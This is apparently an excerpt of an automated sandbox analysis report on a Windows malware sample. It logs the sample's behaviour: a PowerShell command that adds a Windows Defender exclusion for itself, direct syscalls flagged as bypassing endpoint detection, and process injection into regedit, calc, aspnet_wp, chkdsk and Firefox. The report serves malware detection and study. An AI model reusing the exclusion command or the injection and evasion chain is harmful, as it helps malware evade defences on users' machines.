Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559903E mov eax, dword ptr fs:[00000030h]	5_2_0559903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CA020 mov eax, dword ptr fs:[00000030h]	5_2_054CA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CC020 mov eax, dword ptr fs:[00000030h]	5_2_054CC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A50D9 mov eax, dword ptr fs:[00000030h]	5_2_055A50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055520DE mov eax, dword ptr fs:[00000030h]	5_2_055520DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov ecx, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov ecx, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov ecx, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov ecx, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0 mov eax, dword ptr fs:[00000030h]	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F90DB mov eax, dword ptr fs:[00000030h]	5_2_054F90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D0C0 mov eax, dword ptr fs:[00000030h]	5_2_0554D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D0C0 mov eax, dword ptr fs:[00000030h]	5_2_0554D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055120F0 mov ecx, dword ptr fs:[00000030h]	5_2_055120F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D80E9 mov eax, dword ptr fs:[00000030h]	5_2_054D80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F50E4 mov eax, dword ptr fs:[00000030h]	5_2_054F50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F50E4 mov ecx, dword ptr fs:[00000030h]	5_2_054F50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_054CA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055560E0 mov eax, dword ptr fs:[00000030h]	5_2_055560E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CC0F0 mov eax, dword ptr fs:[00000030h]	5_2_054CC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CD08D mov eax, dword ptr fs:[00000030h]	5_2_054CD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D208A mov eax, dword ptr fs:[00000030h]	5_2_054D208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550909C mov eax, dword ptr fs:[00000030h]	5_2_0550909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555D080 mov eax, dword ptr fs:[00000030h]	5_2_0555D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555D080 mov eax, dword ptr fs:[00000030h]	5_2_0555D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D5096 mov eax, dword ptr fs:[00000030h]	5_2_054D5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FD090 mov eax, dword ptr fs:[00000030h]	5_2_054FD090

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe base: 400000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Section loaded: NULL target: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\chkdsk.exe

Thread register set: target process: 3624

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\chkdsk.exe

Thread APC queued: target process: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\regedit.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\regedit.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\System32\calc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\System32\calc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe base: B81008	Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000000.1743287695.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129775659.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000000.1903922664.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000000.1743287695.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129775659.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000000.1903922664.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000000.1743287695.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129775659.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000000.1903922664.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000000.1743287695.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129775659.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000000.1903922664.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Queries volume information: C:\Users\user\Desktop\eNXDCIvEXI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

